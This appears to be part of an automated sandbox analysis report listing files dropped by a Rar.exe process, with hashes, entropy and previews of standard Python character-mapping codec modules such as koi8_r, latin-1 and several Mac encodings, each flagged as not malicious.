                                                                                                                                                                                      SHA1:C4AC11C4903178821FE680C732462C02626C016B
                                                                                                                                                                                      SHA-256:90A883B291D5F1E6DBB735413D51648C31580B1927500161C16624836D01E5EE
                                                                                                                                                                                      SHA-512:A84BD3BDBC4BCBFE90B550CB4FFB6CDBEBBB4B1C3824A931CBA448E84C79D4D6B05D9D67C0718FA97F790B8C1071C775010058306BCEC2769D4E721808CED8FF
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                      Preview:""" Python Character Mapping Codec koi8_r generated from 'MAPPINGS/VENDORS/MISC/KOI8-R.TXT' with gencodec.py....."""#"....import codecs....### Codec APIs....class Codec(codecs.Codec):.... def encode(self,input,errors='strict'):.. return codecs.charmap_encode(input,errors,encoding_table).... def decode(self,input,errors='strict'):.. return codecs.charmap_decode(input,errors,decoding_table)....class IncrementalEncoder(codecs.IncrementalEncoder):.. def encode(self, input, final=False):.. return codecs.charmap_encode(input,self.errors,encoding_table)[0]....class IncrementalDecoder(codecs.IncrementalDecoder):.. def decode(self, input, final=False):.. return codecs.charmap_decode(input,self.errors,decoding_table)[0]....class StreamWriter(Codec,codecs.StreamWriter):.. pass....class StreamReader(Codec,codecs.StreamReader):.. pass....### encodings module API....def getregentry():.. return codecs.CodecInfo(.. name='koi8-r',.. encode=
                                                                                                                                                                                      Process:C:\Users\user\Downloads\A vide k s k pek gyujtem nye szerzoi jogv delem alatt ll a szerzo ltal\Documents\Rar.exe
                                                                                                                                                                                      File Type:Python script, Unicode text, UTF-8 text executable, with CRLF line terminators
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):13501
                                                                                                                                                                                      Entropy (8bit):4.664370116157909
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:192:ahsuOTDvRNUrXPLouhIAs2+imIzDCYPfuyEdP:fTLuhIAl5jfuxP
                                                                                                                                                                                      MD5:B2F96B9A1CF37B7C81BE8704D4E62EF9
                                                                                                                                                                                      SHA1:AB37BF387BF19A833126952D139E41093DD217D9
                                                                                                                                                                                      SHA-256:86D922A935AFDE1BD7C22CF8A9F23A237511C92C51509A80051DD2862A84D09F
                                                                                                                                                                                      SHA-512:F139A2AAB199BB95905B6C020A6410D9FC1C67486BB8AF7796CE41BCC8CDE7AE034749F50728162BE836AE2D4ED74D4ED82282EE56517843C404412C72756ECE
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                      Preview:""" Python Character Mapping Codec koi8_t.."""..# http://ru.wikipedia.org/wiki/...-8..# http://www.opensource.apple.com/source/libiconv/libiconv-4/libiconv/tests/KOI8-T.TXT....import codecs....### Codec APIs....class Codec(codecs.Codec):.... def encode(self,input,errors='strict'):.. return codecs.charmap_encode(input,errors,encoding_table).... def decode(self,input,errors='strict'):.. return codecs.charmap_decode(input,errors,decoding_table)....class IncrementalEncoder(codecs.IncrementalEncoder):.. def encode(self, input, final=False):.. return codecs.charmap_encode(input,self.errors,encoding_table)[0]....class IncrementalDecoder(codecs.IncrementalDecoder):.. def decode(self, input, final=False):.. return codecs.charmap_decode(input,self.errors,decoding_table)[0]....class StreamWriter(Codec,codecs.StreamWriter):.. pass....class StreamReader(Codec,codecs.StreamReader):.. pass....### encodings module API....def getregentry():.. return c
                                                                                                                                                                                      Process:C:\Users\user\Downloads\A vide k s k pek gyujtem nye szerzoi jogv delem alatt ll a szerzo ltal\Documents\Rar.exe
                                                                                                                                                                                      File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):14069
                                                                                                                                                                                      Entropy (8bit):4.689466302139651
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:192:SHhsuOTDvR6UrXPLouhIAs2+i4bur6e9zuyEdP:fTIuhIAl/5uxP
                                                                                                                                                                                      MD5:211B71B4C717939EDEDBFD33A9C726BE
                                                                                                                                                                                      SHA1:64DEB95FD1A59EC03B09643BE2F2055A079151E4
                                                                                                                                                                                      SHA-256:9F77F72F8A42A1BA97C7D53AFDB6F6A6D4E08707CAA4D4CD57D6C113156BB32B
                                                                                                                                                                                      SHA-512:3CBACB39A0994C5285E5B0316B3816916D43C6EE607398022B7BF05430A9621416C2F28A848C2E90B47BE147DDFFB7CF03D5CE8C129BFE52247D6AA238FF5639
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                      Preview:""" Python Character Mapping Codec koi8_u generated from 'python-mappings/KOI8-U.TXT' with gencodec.py....."""#"....import codecs....### Codec APIs....class Codec(codecs.Codec):.... def encode(self,input,errors='strict'):.. return codecs.charmap_encode(input,errors,encoding_table).... def decode(self,input,errors='strict'):.. return codecs.charmap_decode(input,errors,decoding_table)....class IncrementalEncoder(codecs.IncrementalEncoder):.. def encode(self, input, final=False):.. return codecs.charmap_encode(input,self.errors,encoding_table)[0]....class IncrementalDecoder(codecs.IncrementalDecoder):.. def decode(self, input, final=False):.. return codecs.charmap_decode(input,self.errors,decoding_table)[0]....class StreamWriter(Codec,codecs.StreamWriter):.. pass....class StreamReader(Codec,codecs.StreamReader):.. pass....### encodings module API....def getregentry():.. return codecs.CodecInfo(.. name='koi8-u',.. encode=Codec(
                                                                                                                                                                                      Process:C:\Users\user\Downloads\A vide k s k pek gyujtem nye szerzoi jogv delem alatt ll a szerzo ltal\Documents\Rar.exe
                                                                                                                                                                                      File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):14030
                                                                                                                                                                                      Entropy (8bit):4.572243714560591
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:192:Mn/GuINDBTXqJPnXEeXGyQCmEYcrj6CbwK+avSMcdgF:LNneXGy1lHwK+avSMNF
                                                                                                                                                                                      MD5:F4729A1242BD140B732D4BEE6E137558
                                                                                                                                                                                      SHA1:44EFA222BB2CA9ADD776C29A098F9F03FF03E515
                                                                                                                                                                                      SHA-256:DA8BAC477F14620D8AA89EB6CB8963602E1C39724148369C88EF48C95D495011
                                                                                                                                                                                      SHA-512:F5812E38B06620752A557FA70F207AA3298A2FEC7598107BCE749F5B1529A8CA92CAC5AD72E068F6F711C714868389861E93B25B484FA2AD13FC8B3A50EE797E
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                      Preview:""" Python Character Mapping Codec kz1048 generated from 'MAPPINGS/VENDORS/MISC/KZ1048.TXT' with gencodec.py....."""#"....import codecs....### Codec APIs....class Codec(codecs.Codec):.... def encode(self, input, errors='strict'):.. return codecs.charmap_encode(input, errors, encoding_table).... def decode(self, input, errors='strict'):.. return codecs.charmap_decode(input, errors, decoding_table)....class IncrementalEncoder(codecs.IncrementalEncoder):.. def encode(self, input, final=False):.. return codecs.charmap_encode(input, self.errors, encoding_table)[0]....class IncrementalDecoder(codecs.IncrementalDecoder):.. def decode(self, input, final=False):.. return codecs.charmap_decode(input, self.errors, decoding_table)[0]....class StreamWriter(Codec, codecs.StreamWriter):.. pass....class StreamReader(Codec, codecs.StreamReader):.. pass....### encodings module API....def getregentry():.. return codecs.CodecInfo(.. name='kz1048',..
                                                                                                                                                                                      Process:C:\Users\user\Downloads\A vide k s k pek gyujtem nye szerzoi jogv delem alatt ll a szerzo ltal\Documents\Rar.exe
                                                                                                                                                                                      File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):1314
                                                                                                                                                                                      Entropy (8bit):4.724793488479122
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:24:J4OSEHV0yWJyWKMufQ2hQZUQWSJzWSJDtyWVyWg9ZKj9b1QJxFplR:J4OSJui6SJ6SJ8TKnQJxTz
                                                                                                                                                                                      MD5:92C4D5E13FE5ABECE119AA4D0C4BE6C5
                                                                                                                                                                                      SHA1:79E464E63E3F1728EFE318688FE2052811801E23
                                                                                                                                                                                      SHA-256:6D5A6C46FE6675543EA3D04D9B27CCCE8E04D6DFEB376691381B62D806A5D016
                                                                                                                                                                                      SHA-512:C95F5344128993E9E6C2BF590CE7F2CFFA9F3C384400A44C0BC3ACA71D666ED182C040EC495EA3AF83ABBD9053C705334E5F4C3F7C07F65E7031E95FDFB7A561
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                      Preview:""" Python 'latin-1' Codec......Written by Marc-Andre Lemburg (mal@lemburg.com).....(c) Copyright CNRI, All Rights Reserved. NO WARRANTY....."""..import codecs....### Codec APIs....class Codec(codecs.Codec):.... # Note: Binding these as C functions will result in the class not.. # converting them to methods. This is intended... encode = codecs.latin_1_encode.. decode = codecs.latin_1_decode....class IncrementalEncoder(codecs.IncrementalEncoder):.. def encode(self, input, final=False):.. return codecs.latin_1_encode(input,self.errors)[0]....class IncrementalDecoder(codecs.IncrementalDecoder):.. def decode(self, input, final=False):.. return codecs.latin_1_decode(input,self.errors)[0]....class StreamWriter(Codec,codecs.StreamWriter):.. pass....class StreamReader(Codec,codecs.StreamReader):.. pass....class StreamConverter(StreamWriter,StreamReader):.... encode = codecs.latin_1_decode.. decode = codecs.latin_1_encode....### encodings module API..
                                                                                                                                                                                      Process:C:\Users\user\Downloads\A vide k s k pek gyujtem nye szerzoi jogv delem alatt ll a szerzo ltal\Documents\Rar.exe
                                                                                                                                                                                      File Type:CSV text
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):37165
                                                                                                                                                                                      Entropy (8bit):4.736863402692657
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:384:RakostECDXJVf+hiOjiU6Q3DBEQ12yWQZr75CAwKC1/h:Ukost5LX2htjN6QT682PQx5PwVJ
                                                                                                                                                                                      MD5:C269925332C46C7A774FBFCAD74F4B66
                                                                                                                                                                                      SHA1:5F9542A16C83A7EE831F320507BD87756B398DCF
                                                                                                                                                                                      SHA-256:F5C262F930F3B7D83466283347F8B0D7B5C7CBF18DD6FCEB4FAF93DBCD58839E
                                                                                                                                                                                      SHA-512:5BAE57045F650E062EAEA05106F726A0C9B29409CA6CD9667338473DF8CA779BE8965C5F8BD5D87B2DDB76024794AFFC92FF98850D0D0161269133AC3B2F7825
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                      Preview:""" Python Character Mapping Codec generated from 'VENDORS/APPLE/ARABIC.TXT' with gencodec.py....."""#"....import codecs....### Codec APIs....class Codec(codecs.Codec):.... def encode(self,input,errors='strict'):.. return codecs.charmap_encode(input,errors,encoding_map).... def decode(self,input,errors='strict'):.. return codecs.charmap_decode(input,errors,decoding_table)....class IncrementalEncoder(codecs.IncrementalEncoder):.. def encode(self, input, final=False):.. return codecs.charmap_encode(input,self.errors,encoding_map)[0]....class IncrementalDecoder(codecs.IncrementalDecoder):.. def decode(self, input, final=False):.. return codecs.charmap_decode(input,self.errors,decoding_table)[0]....class StreamWriter(Codec,codecs.StreamWriter):.. pass....class StreamReader(Codec,codecs.StreamReader):.. pass....### encodings module API....def getregentry():.. return codecs.CodecInfo(.. name='mac-arabic',.. encode=Codec().encode,
                                                                                                                                                                                      Process:C:\Users\user\Downloads\A vide k s k pek gyujtem nye szerzoi jogv delem alatt ll a szerzo ltal\Documents\Rar.exe
                                                                                                                                                                                      File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):13940
                                                                                                                                                                                      Entropy (8bit):4.577897629122807
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:192:wHhsuOTDvRI7ZpouhIAs2+iy2w4kN8gzeqBwHr+:tTZuhIAl+4E16ap
                                                                                                                                                                                      MD5:C3FC8C5389BFDF1371B849C38FE1A20C
                                                                                                                                                                                      SHA1:009654FD007C938E2FC889B64954FD139EE051E8
                                                                                                                                                                                      SHA-256:68539CA54FFD5D96C07F3590E720D8A28009CB7CAA13E607AC3084D19DD5A19A
                                                                                                                                                                                      SHA-512:8F81FD2106ED43E0CE34004576ED99D77FB6766EC6B757EB4F8B815742E86F90C36CDBAF19E9C3BE3D4F2B92B94695D014721C4A2D7E22312155BE7FBA1164BA
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                      Preview:""" Python Character Mapping Codec mac_croatian generated from 'MAPPINGS/VENDORS/APPLE/CROATIAN.TXT' with gencodec.py....."""#"....import codecs....### Codec APIs....class Codec(codecs.Codec):.... def encode(self,input,errors='strict'):.. return codecs.charmap_encode(input,errors,encoding_table).... def decode(self,input,errors='strict'):.. return codecs.charmap_decode(input,errors,decoding_table)....class IncrementalEncoder(codecs.IncrementalEncoder):.. def encode(self, input, final=False):.. return codecs.charmap_encode(input,self.errors,encoding_table)[0]....class IncrementalDecoder(codecs.IncrementalDecoder):.. def decode(self, input, final=False):.. return codecs.charmap_decode(input,self.errors,decoding_table)[0]....class StreamWriter(Codec,codecs.StreamWriter):.. pass....class StreamReader(Codec,codecs.StreamReader):.. pass....### encodings module API....def getregentry():.. return codecs.CodecInfo(.. name='mac-croatian',..
                                                                                                                                                                                      Process:C:\Users\user\Downloads\A vide k s k pek gyujtem nye szerzoi jogv delem alatt ll a szerzo ltal\Documents\Rar.exe
                                                                                                                                                                                      File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):13761
                                                                                                                                                                                      Entropy (8bit):4.613646718299373
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:192:8HhsuOTDvRA7ZpouhIAs2+i4Xm8jLPeqBap+f:pTduhIAl+mmia1f
                                                                                                                                                                                      MD5:69AF178D83304D0AB6260D64CC9C734F
                                                                                                                                                                                      SHA1:AA73ADF92F5762F559B26C9858590AA750D4F25F
                                                                                                                                                                                      SHA-256:AC11E1F54789AFF782D79FE7D6FD52183EF0F57B6AC4A0F680353FE0113F0D4D
                                                                                                                                                                                      SHA-512:A42B7C7CD5E6AE157B1DCE131264C353DF0FF6FEA09B06D1498EF07931D94D91C48D311964E0F35D4DF893CE65BFD5F3339BB9E1541DFBE2A2FEED25A478E9F9
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                      Preview:""" Python Character Mapping Codec mac_cyrillic generated from 'MAPPINGS/VENDORS/APPLE/CYRILLIC.TXT' with gencodec.py....."""#"....import codecs....### Codec APIs....class Codec(codecs.Codec):.... def encode(self,input,errors='strict'):.. return codecs.charmap_encode(input,errors,encoding_table).... def decode(self,input,errors='strict'):.. return codecs.charmap_decode(input,errors,decoding_table)....class IncrementalEncoder(codecs.IncrementalEncoder):.. def encode(self, input, final=False):.. return codecs.charmap_encode(input,self.errors,encoding_table)[0]....class IncrementalDecoder(codecs.IncrementalDecoder):.. def decode(self, input, final=False):.. return codecs.charmap_decode(input,self.errors,decoding_table)[0]....class StreamWriter(Codec,codecs.StreamWriter):.. pass....class StreamReader(Codec,codecs.StreamReader):.. pass....### encodings module API....def getregentry():.. return codecs.CodecInfo(.. name='mac-cyrillic',..
                                                                                                                                                                                      Process:C:\Users\user\Downloads\A vide k s k pek gyujtem nye szerzoi jogv delem alatt ll a szerzo ltal\Documents\Rar.exe
                                                                                                                                                                                      File Type:CSV text
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):15477
                                                                                                                                                                                      Entropy (8bit):4.803106966743048
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:192:4HhsuOTDvRe7Zt+/UxcXwz1BhFouhCuMQ+iujx5zCdxeiu5iEpkHzWO0yfZBcsWR:FTPuhCuj6fHmHzp03
                                                                                                                                                                                      MD5:46E0758A4DF808F2649BD6B7262362BA
                                                                                                                                                                                      SHA1:A647995DAE668E9D2EDF34529CF1DDDD06AC8016
                                                                                                                                                                                      SHA-256:B0F1FA8399AD1844EF5F07ACFCD523585AB576F411D845A008A610FF6A25AD31
                                                                                                                                                                                      SHA-512:ABB217D00013E01B89855773B9CA728F2F0D14C9E3A7F4CC705588D458CB06E93A6FC187F87FD084F78E0668094324F9D0857D58CFC68D04A8883C8973BB6A77
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                      Preview:""" Python Character Mapping Codec mac_farsi generated from 'MAPPINGS/VENDORS/APPLE/FARSI.TXT' with gencodec.py....."""#"....import codecs....### Codec APIs....class Codec(codecs.Codec):.... def encode(self,input,errors='strict'):.. return codecs.charmap_encode(input,errors,encoding_table).... def decode(self,input,errors='strict'):.. return codecs.charmap_decode(input,errors,decoding_table)....class IncrementalEncoder(codecs.IncrementalEncoder):.. def encode(self, input, final=False):.. return codecs.charmap_encode(input,self.errors,encoding_table)[0]....class IncrementalDecoder(codecs.IncrementalDecoder):.. def decode(self, input, final=False):.. return codecs.charmap_decode(input,self.errors,decoding_table)[0]....class StreamWriter(Codec,codecs.StreamWriter):.. pass....class StreamReader(Codec,codecs.StreamReader):.. pass....### encodings module API....def getregentry():.. return codecs.CodecInfo(.. name='mac-farsi',.. e
                                                                                                                                                                                      Process:C:\Users\user\Downloads\A vide k s k pek gyujtem nye szerzoi jogv delem alatt ll a szerzo ltal\Documents\Rar.exe
                                                                                                                                                                                      File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):14028
                                                                                                                                                                                      Entropy (8bit):4.6264619578502515
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:192:WlHhsuOTDvRT7ZpouhIAs2+iEh+GsHlIu/lwqBxTj/Fq3FHEj:rTCuhIAl6+GeJ/Wa3QVQ
                                                                                                                                                                                      MD5:338143EC1BC5F5DDE251657BECC4667A
                                                                                                                                                                                      SHA1:E68BFEAB6E5209748AC47B44505E6CA581141647
                                                                                                                                                                                      SHA-256:4C67D361F922B611213FD8FEB9FCAAA9FF8CB57CD961F1CA1B5CF4483B1DEE66
                                                                                                                                                                                      SHA-512:D58D0F6309FCF945FF25F7B5D825E8BAB1BFBDB40490110ADBA51B587AED5BE101A22C22CA99B9A4FF9B355F8E7980A713EA6CDD550403B37915EB79796E8A39
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                      Preview:""" Python Character Mapping Codec mac_greek generated from 'MAPPINGS/VENDORS/APPLE/GREEK.TXT' with gencodec.py....."""#"....import codecs....### Codec APIs....class Codec(codecs.Codec):.... def encode(self,input,errors='strict'):.. return codecs.charmap_encode(input,errors,encoding_table).... def decode(self,input,errors='strict'):.. return codecs.charmap_decode(input,errors,decoding_table)....class IncrementalEncoder(codecs.IncrementalEncoder):.. def encode(self, input, final=False):.. return codecs.charmap_encode(input,self.errors,encoding_table)[0]....class IncrementalDecoder(codecs.IncrementalDecoder):.. def decode(self, input, final=False):.. return codecs.charmap_decode(input,self.errors,decoding_table)[0]....class StreamWriter(Codec,codecs.StreamWriter):.. pass....class StreamReader(Codec,codecs.StreamReader):.. pass....### encodings module API....def getregentry():.. return codecs.CodecInfo(.. name='mac-greek',.. e
                                                                                                                                                                                      Process:C:\Users\user\Downloads\A vide k s k pek gyujtem nye szerzoi jogv delem alatt ll a szerzo ltal\Documents\Rar.exe
                                                                                                                                                                                      File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):13805
                                                                                                                                                                                      Entropy (8bit):4.569004919357403
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:192:+HhsuOTDvRB7ZpouhIAs2+iy2wkKY2gKPeqBamec6U6+8:LTcuhIAl+k3LFam
                                                                                                                                                                                      MD5:8FF7EE70CFFA2B336AEE3367796C96ED
                                                                                                                                                                                      SHA1:1F26D1C59F9A124AD334FB2BB3FC1E3D605587FA
                                                                                                                                                                                      SHA-256:64DE55FD0EA0FE4D2512B2303DCB3D20CC57061D78D08A11D3AA6F19E1877826
                                                                                                                                                                                      SHA-512:6D0A64EBFA6F29FD5317043F9C08D0D1F68A39B6640615B2EF093C99629479CE8562C29AEA6509E2FEB255BFE93D0E9FCE9FB1DB43F86F17FE366ADC2788FC7F
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                      Preview:""" Python Character Mapping Codec mac_iceland generated from 'MAPPINGS/VENDORS/APPLE/ICELAND.TXT' with gencodec.py....."""#"....import codecs....### Codec APIs....class Codec(codecs.Codec):.... def encode(self,input,errors='strict'):.. return codecs.charmap_encode(input,errors,encoding_table).... def decode(self,input,errors='strict'):.. return codecs.charmap_decode(input,errors,decoding_table)....class IncrementalEncoder(codecs.IncrementalEncoder):.. def encode(self, input, final=False):.. return codecs.charmap_encode(input,self.errors,encoding_table)[0]....class IncrementalDecoder(codecs.IncrementalDecoder):.. def decode(self, input, final=False):.. return codecs.charmap_decode(input,self.errors,decoding_table)[0]....class StreamWriter(Codec,codecs.StreamWriter):.. pass....class StreamReader(Codec,codecs.StreamReader):.. pass....### encodings module API....def getregentry():.. return codecs.CodecInfo(.. name='mac-iceland',..
                                                                                                                                                                                      Process:C:\Users\user\Downloads\A vide k s k pek gyujtem nye szerzoi jogv delem alatt ll a szerzo ltal\Documents\Rar.exe
                                                                                                                                                                                      File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):14430
                                                                                                                                                                                      Entropy (8bit):4.621572363853459
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:192:S3hsuOTDvRNUrXPLouhIAs2+iDK19L4vJPeqB48:hTnuhIAlmP4EaD
                                                                                                                                                                                      MD5:BAF2B9E09D011F78EA36ED2CC5ED22FD
                                                                                                                                                                                      SHA1:77B62918E1FAFD837EEE086C552265384BB506B4
                                                                                                                                                                                      SHA-256:74C9045009FABFFA3E81B5B41D97A85860BA42D109DB6673A276EA8BA9B59E56
                                                                                                                                                                                      SHA-512:5FB69F8A5FB424B7872B3872CB75B3B538A35533BFE8F8AFFEC44D82B372C866D1841B2568680ACB954CEB696A92EE3091DC06F04EA89DB5651F35F5667B6DA1
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                      Preview:""" Python Character Mapping Codec mac_latin2 generated from 'MAPPINGS/VENDORS/MICSFT/MAC/LATIN2.TXT' with gencodec.py.....Written by Marc-Andre Lemburg (mal@lemburg.com).....(c) Copyright CNRI, All Rights Reserved. NO WARRANTY...(c) Copyright 2000 Guido van Rossum....."""#"....import codecs....### Codec APIs....class Codec(codecs.Codec):.... def encode(self,input,errors='strict'):.. return codecs.charmap_encode(input,errors,encoding_table).... def decode(self,input,errors='strict'):.. return codecs.charmap_decode(input,errors,decoding_table)....class IncrementalEncoder(codecs.IncrementalEncoder):.. def encode(self, input, final=False):.. return codecs.charmap_encode(input,self.errors,encoding_table)[0]....class IncrementalDecoder(codecs.IncrementalDecoder):.. def decode(self, input, final=False):.. return codecs.charmap_decode(input,self.errors,decoding_table)[0]....class StreamWriter(Codec,codecs.StreamWriter):.. pass....class StreamReader(C
                                                                                                                                                                                      Process:C:\Users\user\Downloads\A vide k s k pek gyujtem nye szerzoi jogv delem alatt ll a szerzo ltal\Documents\Rar.exe
                                                                                                                                                                                      File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):13787
                                                                                                                                                                                      Entropy (8bit):4.580644681215749
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:192:wHhsuOTDvR27ZpouhIAs2+iy2w4KY2gKPeqBaoG5:tT/uhIAl+43LFaW
                                                                                                                                                                                      MD5:1F99EDC6D4A3BA200295364C52D6038D
                                                                                                                                                                                      SHA1:8FD1FF1EEC2F74907935621572360E7E53FE7038
                                                                                                                                                                                      SHA-256:6BF6FDE10F2350232DE5EE47D27CAE885362602443B59A924DE8EB6998B18BB2
                                                                                                                                                                                      SHA-512:2924BFF1C570128D57711F91CE1A87B5D156A24144FA3FEBDDDF6C9BB7B82570FB1F9B9FB1C5D23CD9625BF5568F42B718DB3A432F35B47DFF9E72FAE199EA56
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                      Preview:""" Python Character Mapping Codec mac_roman generated from 'MAPPINGS/VENDORS/APPLE/ROMAN.TXT' with gencodec.py....."""#"....import codecs....### Codec APIs....class Codec(codecs.Codec):.... def encode(self,input,errors='strict'):.. return codecs.charmap_encode(input,errors,encoding_table).... def decode(self,input,errors='strict'):.. return codecs.charmap_decode(input,errors,decoding_table)....class IncrementalEncoder(codecs.IncrementalEncoder):.. def encode(self, input, final=False):.. return codecs.charmap_encode(input,self.errors,encoding_table)[0]....class IncrementalDecoder(codecs.IncrementalDecoder):.. def decode(self, input, final=False):.. return codecs.charmap_decode(input,self.errors,decoding_table)[0]....class StreamWriter(Codec,codecs.StreamWriter):.. pass....class StreamReader(Codec,codecs.StreamReader):.. pass....### encodings module API....def getregentry():.. return codecs.CodecInfo(.. name='mac-roman',.. e
                                                                                                                                                                                      Process:C:\Users\user\Downloads\A vide k s k pek gyujtem nye szerzoi jogv delem alatt ll a szerzo ltal\Documents\Rar.exe
                                                                                                                                                                                      File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):13968
                                                                                                                                                                                      Entropy (8bit):4.599704767840293
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:192:FqHhsuOTDvR+7ZpouhIAs2+iy2w4kyYpDgKPeqBaj5:FHTvuhIAl+4cqFaI
                                                                                                                                                                                      MD5:425337635E74A8B98CD770F43848AF18
                                                                                                                                                                                      SHA1:C0F5A92D564177C49E76471117E4B521FD52DF17
                                                                                                                                                                                      SHA-256:1DE13F2703A62479C4312F9A39514C7691CF7F737958B3915AF395A53A596183
                                                                                                                                                                                      SHA-512:853EC8BEB168F69C36AEA83AE221AEADE920DD293928B6F9F61F8938955DF3C709169424D93F49EE05CE2C1AD487CE925808CB136CA91C5022BAD6404008AF6A
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                      Preview:""" Python Character Mapping Codec mac_romanian generated from 'MAPPINGS/VENDORS/APPLE/ROMANIAN.TXT' with gencodec.py....."""#"....import codecs....### Codec APIs....class Codec(codecs.Codec):.... def encode(self,input,errors='strict'):.. return codecs.charmap_encode(input,errors,encoding_table).... def decode(self,input,errors='strict'):.. return codecs.charmap_decode(input,errors,decoding_table)....class IncrementalEncoder(codecs.IncrementalEncoder):.. def encode(self, input, final=False):.. return codecs.charmap_encode(input,self.errors,encoding_table)[0]....class IncrementalDecoder(codecs.IncrementalDecoder):.. def decode(self, input, final=False):.. return codecs.charmap_decode(input,self.errors,decoding_table)[0]....class StreamWriter(Codec,codecs.StreamWriter):.. pass....class StreamReader(Codec,codecs.StreamReader):.. pass....### encodings module API....def getregentry():.. return codecs.CodecInfo(.. name='mac-romanian',..
                                                                                                                                                                                      Process:C:\Users\user\Downloads\A vide k s k pek gyujtem nye szerzoi jogv delem alatt ll a szerzo ltal\Documents\Rar.exe
                                                                                                                                                                                      File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):13820
                                                                                                                                                                                      Entropy (8bit):4.579994522132136
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:192:yHhsuOTDvRT7ZpouhIAs2+iy2w4KY2gKPeqB9NGc:/TquhIAl+43LFal
                                                                                                                                                                                      MD5:1C214A3F28D2D23CC7FDED7A387585A0
                                                                                                                                                                                      SHA1:B40E5DA5FD44499B161BD2649A6258C9A968D5D5
                                                                                                                                                                                      SHA-256:E7F9E6C9F92513C69754AEF1D7AB235B09E9EEADBBCED4C86DF6E2AA2D06A1EF
                                                                                                                                                                                      SHA-512:58C6B56938D709AFC4E756C2F0CC40812724B963B118CE5E1CA84798DFD17F9E324AC8F5B68FA84FE883E91CBEA8E7FC4BBE32EAE175F1B55072FAAFA7F7397A
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                      Preview:""" Python Character Mapping Codec mac_turkish generated from 'MAPPINGS/VENDORS/APPLE/TURKISH.TXT' with gencodec.py....."""#"....import codecs....### Codec APIs....class Codec(codecs.Codec):.... def encode(self,input,errors='strict'):.. return codecs.charmap_encode(input,errors,encoding_table).... def decode(self,input,errors='strict'):.. return codecs.charmap_decode(input,errors,decoding_table)....class IncrementalEncoder(codecs.IncrementalEncoder):.. def encode(self, input, final=False):.. return codecs.charmap_encode(input,self.errors,encoding_table)[0]....class IncrementalDecoder(codecs.IncrementalDecoder):.. def decode(self, input, final=False):.. return codecs.charmap_decode(input,self.errors,decoding_table)[0]....class StreamWriter(Codec,codecs.StreamWriter):.. pass....class StreamReader(Codec,codecs.StreamReader):.. pass....### encodings module API....def getregentry():.. return codecs.CodecInfo(.. name='mac-turkish',..
                                                                                                                                                                                      Process:C:\Users\user\Downloads\A vide k s k pek gyujtem nye szerzoi jogv delem alatt ll a szerzo ltal\Documents\Rar.exe
                                                                                                                                                                                      File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):1258
                                                                                                                                                                                      Entropy (8bit):4.753222127608113
                                                                                                                                                                                      Encrypted:false
